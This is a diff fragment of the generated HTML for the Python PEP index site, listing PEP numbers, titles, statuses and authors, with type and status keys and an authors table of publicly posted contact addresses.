SW395Qualified Names for ModulesAlyssa Coghlan3.4
IW396Module Version NumbersBarry Warsaw
PR401BDFL RetirementBarry Warsaw, Brett Cannon
SR402Simplified Package Layout and PartitioningPhillip J. Eby3.3
SW406Improved Encapsulation of Import StateAlyssa Coghlan, Greg Slodkowicz3.4
SR408Standard library __preview__ packageAlyssa Coghlan, Eli Bendersky3.3
SR410Use decimal.Decimal type for timestampsVictor Stinner3.3
IS411Provisional packages in the Python standard libraryAlyssa Coghlan, Eli Bendersky3.3
PW413Faster evolution of the Python Standard LibraryAlyssa Coghlan
SR416Add a frozendict builtin typeVictor Stinner3.3
SW422Simpler customisation of class creationAlyssa Coghlan, Daniel Urban3.5
IW426Metadata for Python Software Packages 2.0Alyssa Coghlan, Daniel Holth, Donald Stufft
SS431Time zone support improvementsLennart Regebro
SW432Restructuring the CPython startup sequenceAlyssa Coghlan, Victor Stinner, Eric Snow
SS433Easier suppression of file descriptor inheritanceVictor Stinner3.4
SR437A DSL for specifying signatures, annotations and argument convertersStefan Krah3.4
SR439Inclusion of implicit pip bootstrap in Python installationRichard Jones3.4
SR455Adding a key-transforming dictionary to collectionsAntoine Pitrou3.5
SW459Standard Metadata Extensions for Python Software PackagesAlyssa Coghlan
SW460Add binary interpolation and formattingAntoine Pitrou3.5
PW462Core development workflow automation for CPythonAlyssa Coghlan
SR463Exception-catching expressionsChris Angelico3.5
SW469Migration of dict iteration code to Python 3Alyssa Coghlan3.5
SR472Support for indexing with keyword argumentsStefano Borini, Joseph Martinot-Lagarde3.6
SR473Adding structured data to built-in exceptionsSebastian Kreft
PW474Creating forge.python.orgAlyssa Coghlan
PW481Migrate CPython to Git, Github, and PhabricatorDonald Stufft
SR490Chain exceptions at C levelVictor Stinner3.6
IR496Environment MarkersJames Polley
PR497A standard mechanism for backward compatibilityEd Schofield
SR500A protocol for delegating datetime methods to their tzinfo implementationsAlexander Belopolsky, Tim Peters
SW501General purpose template literal stringsAlyssa Coghlan, Nick Humrich3.12
IR502String Interpolation - Extended DiscussionMike G. Miller3.6
SW504Using the System RNG by defaultAlyssa Coghlan3.6
PR507Migrate CPython to Git and GitLabBarry Warsaw
SS509Add a private version to dictVictor Stinner3.6
SR510Specialize functions with guardsVictor Stinner3.6
SR511API for code transformersVictor Stinner3.6
IS513A Platform Tag for Portable Linux Built DistributionsRobert T. McGibbon, Nathaniel J. Smith
SR516Build system abstraction for pip/conda etcRobert Collins, Nathaniel J. Smith
SW521Managing global context via ‘with’ blocks in generators and coroutinesNathaniel J. Smith3.6
SR522Allow BlockingIOError in security sensitive APIsAlyssa Coghlan, Nathaniel J. Smith3.6
SW531Existence checking operatorsAlyssa Coghlan3.7
SW536Final Grammar for Literal String InterpolationPhilipp Angerer3.7
SR542Dot Notation Assignment In Function HeaderMarkus Meskanen
SW543A Unified TLS API for PythonCory Benfield, Christian Heimes3.7
SR546Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7Victor Stinner, Cory Benfield2.7
SR548More Flexible Loop ControlR David Murray3.7
SR549Instance DescriptorsLarry Hastings3.7
SW550Execution ContextYury Selivanov, Elvis Pranskevichus3.7
IW551Security transparency in the Python runtimeSteve Dower3.7
SS554Multiple Interpreters in the StdlibEric Snow3.13
SW555Context-local variables (contextvars)Koos Zevenhoven3.7
SW558Defined semantics for locals()Alyssa Coghlan3.13
SR559Built-in noop()Barry Warsaw3.7
IS571The manylinux2010 Platform TagMark Williams, Geoffrey Thomas, Thomas Kluyver
SW575Unifying function/method classesJeroen Demeyer3.8
SW576Rationalize Built-in function classesMark Shannon3.8
SW577Augmented Assignment ExpressionsAlyssa Coghlan3.8
SR580The C call protocolJeroen Demeyer3.8
SR582Python local packages directoryKushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan3.12
IW583A Concurrency Memory Model for PythonJeffrey Yasskin
IW595Improving bugs.python.orgEzio Melotti, Berker Peksag
IW598Introducing incremental feature releasesAlyssa Coghlan3.9
IS599The manylinux2014 Platform TagDustin Ingram
SR601Forbid return/break/continue breaking out of finallyDamien George, Batuhan Taskaya3.8
IR605A rolling feature release stream for CPythonSteve Dower, Alyssa Coghlan3.9
SR606Python Compatibility VersionVictor Stinner3.9
SR608Coordinated Python releaseMiro Hrončok, Victor Stinner3.9
SW611The one million limitMark Shannon
SW620Hide implementation details from the C APIVictor Stinner3.12
SS622Structural Pattern MatchingBrandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin3.10
SS631Dependency specification in pyproject.toml based on PEP 508Ofek Lev
SR633Dependency specification in pyproject.toml using an exploded TOML tableLaurie Opperman, Arun Babu Neelicattu
SR637Support for indexing with keyword argumentsStefano Borini3.10
SR640Unused variable syntaxThomas Wouters3.10
SR641Using an underscore in the version portion of Python 3.10 compatibility tagsBrett Cannon, Steve Dower, Barry Warsaw3.10
SR642Explicit Pattern Syntax for Structural Pattern MatchingAlyssa Coghlan3.10
SW645Allow writing optional types as x?Maggie Moss
SR648Extensible customizations of the interpreter at startupMario Corchero3.11
SW650Specifying Installer Requirements for Python ProjectsVikram Jayanthi, Dustin Ingram, Brett Cannon
SR651Robust Stack Overflow HandlingMark Shannon
SR662Editable installs via virtual wheelsBernát Gábor
IR663Standardizing Enum str(), repr(), and format() behaviorsEthan Furman3.11
SR665A file format to list Python dependencies for reproducibility of an applicationBrett Cannon, Pradyun Gedam, Tzu-ping Chung
SR666Reject Foolish IndentationLaura Creighton2.2
SR677Callable Type SyntaxSteven Troxler, Pradeep Kumar Srinivasan3.11
SR690Lazy ImportsGermán Méndez Bravo, Carl Meyer3.12
SW704Require virtual environments by default for package installersPradyun Gedam
SR707A simplified signature for __exit__ and __aexit__Irit Katriel3.12
SR712Adding a “converter” parameter to dataclasses.fieldJoshua Cannon3.13
SR713Callable ModulesAmethyst Reese3.12
SR722Dependency specification for single-file scriptsPaul Moore
SW724Stricter Type GuardsRich Chiodo, Eric Traut, Erik De Bonte3.13
SR726Module __setattr__ and __delattr__Sergey B Kirpichev3.13
SR754IEEE 754 Floating Point Special ValuesGregory R. Warnes2.3
SW756Add PyUnicode_Export() and PyUnicode_Import() C functionsVictor Stinner3.14
SW760No More Bare ExceptsPablo Galindo, Brett Cannon3.14
PW3001Procedure for reviewing and improving standard library modulesGeorg Brandl
SR3103A Switch/Case StatementGuido van Rossum3.0
SR3117Postfix type declarationsGeorg Brandl3.0
SR3122Delineation of the main moduleBrett Cannon
SR3125Remove Backslash ContinuationJim J. Jewett
SR3126Remove Implicit String ConcatenationJim J. Jewett, Raymond Hettinger
SR3128BList: A Faster List-like TypeDaniel Stutzbach2.6, 3.0
SR3130Access to Current Module/Class/FunctionJim J. Jewett3.0
SR3133Introducing RolesCollin Winter3.0
SR3136Labeled break and continueMatt Chisholm3.1
SR3139Cleaning out sys and the “interpreter” moduleBenjamin Peterson3.0
SR3140str(container) should call str(item), not repr(item)Oleg Broytman, Jim J. Jewett
SR3142Add a “while” clause to generator expressionsGerald Britton3.0
SW3145Asynchronous I/O For subprocess.PopenEric Pruitt, Charles R. McCreary, Josiah Carlson3.2
SW3146Merging Unladen Swallow into CPythonCollin Winter, Jeffrey Yasskin, Reid Kleckner3.3
SR3152CofunctionsGregory Ewing3.3
SS3153Asynchronous IO supportLaurens Van Houtven
IR8010The Technical Leader Governance ModelBarry Warsaw
IR8011Python Governance Model Lead by Trio of PythonistasMariatta, Barry Warsaw
IR8012The Community Governance ModelŁukasz Langa
IR8013The External Council Governance ModelSteve Dower
IR8014The Commons Governance ModelJack Jansen
IR8015Organization of the Python communityVictor Stinner
+
+
+
+

Reserved PEP Numbers

+ + + + + + + + + + + + + + + +
PEPTitleAuthors
801RESERVEDWarsaw
+
+
+

PEP Types Key

+
    +
  • IInformational: Non-normative PEP containing background, guidelines or other information relevant to the Python ecosystem
  • +
  • PProcess: Normative PEP describing or proposing a change to a Python community process, workflow or governance
  • +
  • SStandards Track: Normative PEP with a new feature for Python, implementation change for CPython or interoperability standard for the ecosystem
  • +
+

More info in PEP 1.

+
+
+

PEP Status Key

+
    +
  • AAccepted: Normative proposal accepted for implementation
  • +
  • AActive: Currently valid informational guidance, or an in-use process
  • +
  • DDeferred: Inactive draft that may be taken up again at a later time
  • +
  • <No letter>Draft: Proposal under active discussion and revision
  • +
  • FFinal: Accepted and implementation complete, or no longer active
  • +
  • PProvisional: Provisionally accepted but additional feedback needed
  • +
  • RRejected: Formally declined and will not be accepted
  • +
  • SSuperseded: Replaced by another succeeding PEP
  • +
  • WWithdrawn: Removed from consideration by sponsor or authors
  • +
+

More info in PEP 1.

+
+
+

Authors/Owners

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameEmail Address
A.M. Kuchlingamk at amk.ca
Aahzaahz at pythoncraft.com
Adam Turnerpython at quite.org.uk
Adrian Garcia Badaraccoadrian at adriangb.com
Alex Gaynoralex.gaynor at gmail.com
Alex Martellialeaxit at gmail.com
Alexander Belopolskyalexander.belopolsky at gmail.com
Alexandre Vassalottialexandre at peadrop.com
Alexis Challandealexis.challande at trailofbits.com
Alice Purcellalicederyn at gmail.com
Alyssa Coghlanncoghlan at gmail.com
Amethyst Reeseamethyst at n7.gg
Ammar Askarammar at ammaraskar.com
Andre Robergeandre.roberge at gmail.com
Andrew McClellandeternalsquire at comcast.net
Andrew McNamaraandrewm at object-craft.com.au
Anthony Baxteranthony at interlink.com.au
Antoine Pitrousolipsis at pitrou.net
Armin Ronacherarmin.ronacher at active-4.com
Arun Babu Neelicattuarun.neelicattu at gmail.com
Atsuo Ishimotoishimoto at gembook.org
Barry Warsawbarry at python.org
Batuhan Taskayabatuhan at python.org
Ben Finneyben+python at benfinney.id.au
Ben Hoytbenhoyt at gmail.com
Ben Northben at redfrontdoor.org
Benjamin Petersonbenjamin at python.org
Benoit Bryonbenoit at marmelune.net
Berker Peksagberker.peksag at gmail.com
Bernát Gáborgaborjbernat at gmail.com
Björn Lindqvistbjourne at gmail.com
Brandt Bucherbrandt at python.org
Brett Cannonbrett at python.org
Brian Quinlanbrian at sweetapp.com
C.A.M. Gerlachcam.gerlach at gerlach.cam
Calvin Spealmanironfroggy at gmail.com
Cameron Simpsoncs at cskk.id.au
Carl Bankspythondev at aerojockey.com
Carl Friedrich Bolz-Tereickcfbolz at gmx.de
Carl Meyercarl at oddbird.net
Carol Willingwillingc at gmail.com
Charles R. McCreary
Charles-François Natalicf.natali at gmail.com
Chris Angelicorosuav at gmail.com
Chris Jerdonekchris.jerdonek at gmail.com
Chris McDonoughchrism at plope.com
Christian Heimeschristian at python.org
Christian R. Reiskiko at async.com.br
Christopher A. Craigpython-pep at ccraig.org
Christopher Barkerpythonchb at gmail.com
Clark C. Evanscce at clarkevans.com
Cliff Wellslogiplexsoftware at earthlink.net
Collin Wintercollinwinter at google.com
Cooper Leesme at cooperlees.com
Cory Benfieldcory at lukasa.co.uk
Damien George
Daniel F Moissetdfmoisset at gmail.com
Daniel Holthdholth at gmail.com
Daniel Stutzbachdaniel at stutzbachenterprises.com
Daniel Urbanurban.dani+py at gmail.com
Dave Coledjc at object-craft.com.au
Dave Peckdavepeck at davepeck.org
David Ascherdavida at activestate.com
David Eppsteineppstein at ics.uci.edu
David Fosterdavid at dafoster.net
David Goodgergoodger at python.org
David Hewitt1939362+davidhewitt at users.noreply.github.com
David Woodsdw-git at d-woods.co.uk
Dennis Sweeneysweeney.dennis650 at gmail.com
Dino Viehlanddinov at microsoft.com
Dirkjan Ochtmandirkjan at ochtman.nl
Domenico Andreolidomenico.andreoli at linux.com
Donald Stufftdonald at stufft.io
Donghee Nadonghee.na at python.org
Doug Hellmanndoug at doughellmann.com
Dustin Ingramdi at python.org
Ed Schofielded at pythoncharmers.com
Eddie Elizondoeduardo.elizondorueda at gmail.com
Ee Durbinee at python.org
Elana Hashmanehashman at debian.org
Eli Benderskyeliben at gmail.com
Elvis Pranskevichuselvis at edgedb.com
Emily Morehouse-Valcarcelemily at python.org
Enegeneg at discuss.python.org
Eric N. Vander Weeleericvw at gmail.com
Eric Pruitt
Eric Snowericsnowcurrently at gmail.com
Eric Trauterictr at microsoft.com
Eric V. Smitheric at trueblade.com
Erik De Bonteerikd at microsoft.com
Erik M. Bray
Erlend Egeberg Aaslanderlend at python.org
Ethan Furmanethan at stoneleaf.us
Ethan Smithethan at ethanhs.me
Ewa Jodlowskaewa at python.org
Ezio Melottiezio.melotti at gmail.com
Facundo Batistafacundo at taniquetil.com.ar
Facundo Tuescafacundo.tuesca at trailofbits.com
Filipe Laínslains at riseup.net
Franek Magieraframagie at gmail.com
Fred L. Drake, Jr.fred at fdrake.net
Frédéric B. Giacomettifred at arakne.com
Fridolín Pokornýfridolin.pokorny at gmail.com
Geoffrey Thomasgeofft at ldpreload.com
Georg Brandlgeorg at python.org
Gerald Brittongerald.britton at gmail.com
Germán Méndez Bravogerman.mb at gmail.com
Gordon McMillangmcm at hypernet.com
Graham Bleaneygbleaney at gmail.com
Grant Griffing2 at iowegian.com
Greg Slodkowiczjergosh at gmail.com
Greg Steingstein at lyra.org
Greg Wilsongvwilson at ddj.com
Gregory Ewinggreg.ewing at canterbury.ac.nz
Gregory Lielensgregory.lielens at fft.be
Gregory P. Smithgreg at krypto.org
Gregory R. Warnesgregory_r_warnes at groton.pfizer.com
Guido van Rossumguido at python.org
Holger Krekelholger at merlinux.eu
Huaiyu Zhuhzhu at users.sourceforge.net
Hugo van Kemenade
Inada Naokisongofacandy at gmail.com
Irit Katrielirit at python.org
Ivan Levkivskyilevkivskyi at gmail.com
Ivona Stojanovicstojanovic.i at hotmail.com
Jack Diederichjackdied at gmail.com
Jack Jansenjack at cwi.nl
James C. Ahlstromjim at interet.com
James Hilton-Balfegobot1234yt at gmail.com
James Polleyjp at jamezpolley.com
Jason Orendorffjason.orendorff at gmail.com
Jason Petronejp at demonseed.net
Jeff Eplerjepler at unpythonic.net
Jeffrey Yasskinjyasskin at google.com
Jelle Zijlstrajelle.zijlstra at gmail.com
Jeremy Hyltonjeremy at alum.mit.edu
Jeroen Demeyerj.demeyer at ugent.be
Jervis Whitleyjervisau at gmail.com
Jesse Nollerjnoller at gmail.com
Jim Althoffjames_althoff at i2.com
Jim Bakerjim.baker at python.org
Jim J. Jewettjimjjewett at gmail.com
Jiwon Seoseojiwon at gmail.com
Joanna Jablonski
Joe Careyjoe at python.org
John Belmontejohn at neggie.net
Jonathan Riehljriehl at spaceship.com
Joop van de Poljoop.vandepol at trailofbits.com
Joseph Jevnikjoejev at gmail.com
Joseph Martinot-Lagarde
Joshua Bambrickjbambrick at google.com
Joshua Cannonjoshdcannon at gmail.com
Joshua Landaujoshua at landau.ws
Joshua Lockjlock at vmware.com
Joshua Xujxu425 at fb.com
Josiah Carlsonjcarlson at uci.edu
Jukka Lehtosalojukka.lehtosalo at iki.fi
Julien Palardjulien at palard.fr
Just van Rossumjust at letterror.com
Justin Capposjcappos at nyu.edu
Ka-Ping Yeeping at zesty.ca
Karl Nelsonnelson85 at llnl.gov
Karolina Surmakarolina.surma at gazeta.pl
Ken Jinkenjin at python.org
Kerrick Staleymail at kerrickstaley.com
Kevin Altisaltis at semi-retired.com
Kevin D. Smithkevin.smith at themorgue.org
Konstantin Kashinkkashin at fb.com
Koos Zevenhovenk7hoven at gmail.com
Koudai Aonokoxudaxi at gmail.com
Kushal Dasmail at kushaldas.in
Larry Hastingslarry at hastings.org
Laura Creightonlac at strakt.com
Laurens Van Houtven_ at lvh.cc
Laurie Oppermanlaurie_opperman at hotmail.com
Lennart Regebroregebro at gmail.com
Lie Ryanlie.1296 at gmail.com
Lino Mastrodomenicol.mastrodomenico at gmail.com
Lisa Roachlisaroach14 at gmail.com
Lois Anne DeLonglad278 at nyu.edu
Lukas Puehringerlukas.puehringer at nyu.edu
Lysandros Nikolaoulisandrosnik at gmail.com
Maggie Mossmaggiebmoss at gmail.com
Magnus Lie Hetlandmagnus at hetland.org
Malcolm Smithsmith at chaquo.com
Marc-Andre Lemburgmal at lemburg.com
Marc-André Lemburgmal at lemburg.com
Marcel Plchgmarcel.plch at gmail.com
Mariattamariatta at python.org
Marina Mooremm9693 at nyu.edu
Mario Corcheromariocj89 at gmail.com
Mark E. Haasemehaase at gmail.com
Mark Hammondmhammond at skippinet.com.au
Mark Mendozamendoza.mark.a at gmail.com
Mark Shannonmark at hotpy.org
Mark Williamsmrw at enotuniq.org
Markus Meskanenmarkusmeskanen at gmail.com
Marta Gómez Macíascyberwitch at google.com
Martijn Faassenfaassen at infrae.com
Martin Teichmannlkb.teichmann at gmail.com
Martin von Löwismartin at v.loewis.de
Masayuki Yamamoto
Matt Chisholmmatt-python at theory.org
Matt Wozniskigodlygeek at gmail.com
Matthew Rahtzmrahtz at google.com
Matthias Klosedoko at ubuntu.com
Micah Elliottmde at tracos.org
Michael Foordmichael at python.org
Michael Hudsonmwh at python.net
Michael J. Sullivansully at msully.net
Michael Leemichael.lee.0x2a at gmail.com
Michael P. Dubnerdubnerm at mindless.com
Michael Sarahanmsarahan at gmail.com
Michel Pelletiermichel at users.sourceforge.net
Mike G. Miller
Mike Meyermwm at mired.org
Mike Verdonemike.verdone at gmail.com
Miro Hrončokmiro at hroncok.cz
Moshe Zadkamoshez at zadka.site.co.il
Nathaniel J. Smithnjs at pobox.com
Neal Norwitznnorwitz at gmail.com
Ned Deilynad at python.org
Neil Hodgsonneilh at scintilla.org
Neil Schemenauernas at arctrix.com
Nick Humrichnick at humrich.us
Ofek Levofekmeister at gmail.com
Oleg Broytmanphd at phdru.name
Oren Tiroshoren at hishome.net
Pablo Galindopablogsal at python.org
Pablo Galindo Salgadopablogsal at python.org
Patrick Maupinpmaupin at gmail.com
Paul Barrettbarrett at stsci.edu
Paul Colomietspaul at colomiets.name
Paul Everittpauleveritt at me.com
Paul F. Duboispaul at pfdubois.com
Paul Gansslepaul at ganssle.io
Paul Moorep.f.moore at gmail.com
Paul Prescodpaul at prescod.net
Peter Astrandastrand at lysator.liu.se
Peter Harrisscav at blueyonder.co.uk
Peter Moodypmoody at google.com
Peter Schneider-Kampnowonder at nowonder.de
Petr Viktorinencukou at gmail.com
Philip Housephouse512 at gmail.com
Philipp Angererphil.angerer at gmail.com
Philippe Ombredannepombredanne at nexb.com
Philippe PRADOSpython at prados.fr
Phillip J. Ebypje at telecommunity.com
Pradeep Kumar Srinivasangohanpra at gmail.com
Pradyun Gedampradyunsg at gmail.com
R David Murray
Ralf Gommersralf.gommers at gmail.com
Raymond Hettingerpython at rcn.com
Reid Klecknerrnk at mit.edu
Rich Chiodorchiodo at microsoft.com
Richard Jonesrichard at python.org
Richard Oudkerkr.m.oudkerk at googlemail.com
Robert Collinsrbtcollins at hp.com
Robert Kuskarkuska at redhat.com
Robert T. McGibbonrmcgibbo at gmail.com
Roman Suzirnd at onego.ru
Ronald Oussorenronaldoussoren at mac.com
Russell Keith-Mageerussell at keith-magee.com
Ryan Gonzalezrymg19 at gmail.com
Sam Grosscolesbury at gmail.com
Samuele Pedronipedronis at python.org
Savannah Ostrowskisavannahostrowski at gmail.com
Scott Gilbertxscottg at yahoo.com
Sean Reifschneiderjafo-pep at tummy.com
Sebastian Kreftskreft at deezer.com
Sebastián Ramíreztiangolo at gmail.com
Sergey B Kirpichevskirpichev at gmail.com
Serhiy Storchaka
Seth Michael Larsonseth at python.org
Sébastien Eustacesebastien at eustace.io
Shannon Zhuszhu at fb.com
Shantanu Jainhauntsaninja at gmail.com
Simon Crosshodgestar at gmail.com
Skip Montanaroskip at pobox.com
Stefan Behnelstefan_ml at behnel.de
Stefan Krahskrah at bytereef.org
Stefano Borini
Stefano Riverastefanor at debian.org
Stepan Koltsovyozh at mx1.ru
Stepan Sindelarstepan.sindelar at oracle.com
Stephen J. Turnbullstephen at xemacs.org
Stephen Rosensirosen0 at gmail.com
Steve Dowersteve.dower at python.org
Steven Bethardsteven.bethard at gmail.com
Steven D’Apranosteve at pearwood.info
Steven Taschukstaschuk at telusplanet.net
Steven Troxlersteven.troxler at gmail.com
Stéphane Bidoulstephane.bidoul at gmail.com
Sumana Harihareswarash at changeset.nyc
Tal Einattal at python.org
Talinviridia at gmail.com
Taneli Hukkinen
Tarek Ziadétarek at ziade.org
Terence Wayterry at wayforward.net
Terry Reedytjreedy at udel.edu
The Python core team and community
Thomas Bellmanbellman+pep-divmod at lysator.liu.se
Thomas Hellertheller at python.net
Thomas Kluyverthomas at kluyver.me.uk
Thomas Woutersthomas at python.org
Tian Gaogaogaotiantian at hotmail.com
Till Varoquauxtill at fb.com
Tim Delaneytimothy.c.delaney at gmail.com
Tim Felgentrefftim.felgentreff at oracle.com
Tim Peterstim.peters at gmail.com
Tobias Kohnkohnt at tobiaskohn.ch
Todd Rovitorovitotv at gmail.com
Tomáš Orsavatomas.n at orsava.cz
Tony Lowndstony at lownds.com
Travis Oliphantoliphant at ee.byu.edu
Trent Micktrentm at activestate.com
Trishank Karthik Kuppusamykarthik at trishank.com
Tzu-ping Chunguranusjr at gmail.com
Victor Stinnervstinner at python.org
Vikram Jayanthivikramjayanthi at google.com
Vinay Sajipvinay_sajip at red-dove.com
Vincent Silesvsiles at fb.com
Vladimir Diazvladimir.diaz at nyu.edu
W Isaac Carrollicarroll at pobox.com
Walter Dörwaldwalter at livinglogic.de
Wenzel Jakobwenzel.jakob at epfl.ch
William Woodruffwilliam at yossarian.net
Yury Selivanovyury at edgedb.com
Zac Hatfield-Doddszac at zhd.dev
Zachary Warezach at python.org
Zixuan James Lip359101898 at gmail.com
Łukasz Langalukasz at python.org
+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/numerical/index.html b/numerical/index.html new file mode 100644 index 00000000000..8780a7907e6 --- /dev/null +++ b/numerical/index.html @@ -0,0 +1,4113 @@ + + + + + + + + Numerical Index | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Numerical Index

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 